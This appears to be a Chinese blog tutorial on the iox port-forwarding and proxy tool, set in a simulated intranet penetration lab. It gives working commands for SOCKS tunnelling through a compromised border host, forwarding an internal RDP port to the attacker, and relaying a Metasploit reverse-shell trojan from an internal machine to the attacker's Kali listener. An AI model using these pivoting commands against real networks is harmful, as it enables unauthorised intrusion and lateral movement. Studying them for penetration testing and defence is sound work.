点击上方“蓝字”,关注更多精彩
0x00 iox介绍
What's iox?
iox是一款Go语言编写的开源端口转发&内网代理工具。虽然是两年前的了,但是我用着还是很舒服。
项目地址:https://github.com/EddieIvan01/iox
Why iox?
1、它可以说是ew
、lcx
的升级版,可以实现流量转发,端口转发、socks
隧道、udp
流量转发、流量加密等功能。
2、小巧、简便、无需繁琐的配置;命令逻辑清晰简便。
0x01 环境搭建
1、经典的ABC网络,A为外网,B为边界机区域,C为内网机器(不出网)
2、假设我们攻下了边界机ubuntu,msf生成一个木马,让其上线
3、下载iox
https://github.com/EddieIvan01/iox/releases/tag/v0.4
0x02 iox proxy模式
iox的用法是统一的,-l/--local
意为监听本地端口;-r/--remote
意为连接远端主机。先来试试proxy模式。
1、通过msf上传iox
文件至边界机ubuntu
,并添加执行权限
2、kali使用iox proxy模式
开启监听
./iox proxy -l 9999 -l 1080
#注意两个端口顺序不要错
3、边界机器ubuntu使用iox回连
./iox proxy -r kali_ip:9999
4、随后配置proxychains.conf
文件
5、成功访问内网centos机器的apache服务
0x03 iox fwd模式
内网3389转发到kali
思路是一样的,将内网目标机器的3389转发到kali的3389,随后kali上再将3389的流量转到别的端口上,如33890。
边界机上执行:./iox fwd -r <windows08>:3389 -r <kali_ip>:9999
kali上执行:./iox fwd -l 3389 -l 33890
内网机器反向回连
目标windows2008是内网的一台机器,不能反向链接kali,通常情况下我们的套路是:挂路由传正向马上线
这次我们试试反向的,首先要知道,内网windows2008机器不能直接反连kali。但是C能直连B,B又能直连A。
但是可以反连边界机ubuntu,所以我们先生成一个回连ubuntu4444端口的木马。
也就是说完成了下图蓝色箭头这一步
随后既然边界机能够回连kali
,那么我们就可以通过ubuntu
上面的iox
将4444端口获取的流量,转发给kali
的5555
./iox fwd -l 4444 -r 192.168.31.84:5555
即完成了下图这一步
接下来kali
开启msf
监听5555
,上传木马至边界机,内网windows08
下载木马运行即可回连
0x04 启用加密
fwd模式加密
我们还是把内网windows08
的3389
端口转发到边界机,只不过这次是加密了。
-r
和-l
参数需要在目标地址前加一个*
来表示加密。
边界ubuntu执行:./iox fwd -r <win08>:3389 -r *<kali>:8888 -k 656565
kali执行:./iox fwd -l *8888 -l 33890 -k 656565
proxy模式加密
同理,这里贴一下命令。
./iox proxy -l *9999 -k 000102
./iox fwd -l 1080 -r *<kali>:9999 -k 000102
0x05 UDP流量转发
既然是UDP
流量转发,那么proxy
代理模式就肯定用不了,因为proxy默认走的socks5
很简单,在命令后面加个-u
参数即可。
./iox fwd -l 53 -r *127.0.0.1:8888 -k 000102 -u
./iox fwd -l *8888 -l *9999 -k 000102 -u
./iox fwd -r *127.0.0.1:9999 -r 8.8.8.8:53 -k 000102 -u
用的不是很多,了解一下即可。主要还是前面的fwd
端口转发和proxy
隧道代理功能。
往期推荐
CVE-2022-32230 Windows SMB拒绝服务漏洞
郑重声明:该公众号大部分文章来自作者日常工作与学习笔记,也有少数文章是经过原作者授权转载而来,未经授权,严禁转载。如需要,请公众号私信联系作者。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与原作者以及本公众号无关。
原文始发于微信公众号(HACK技术沉淀营):内网渗透 | iox端口转发&代理工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论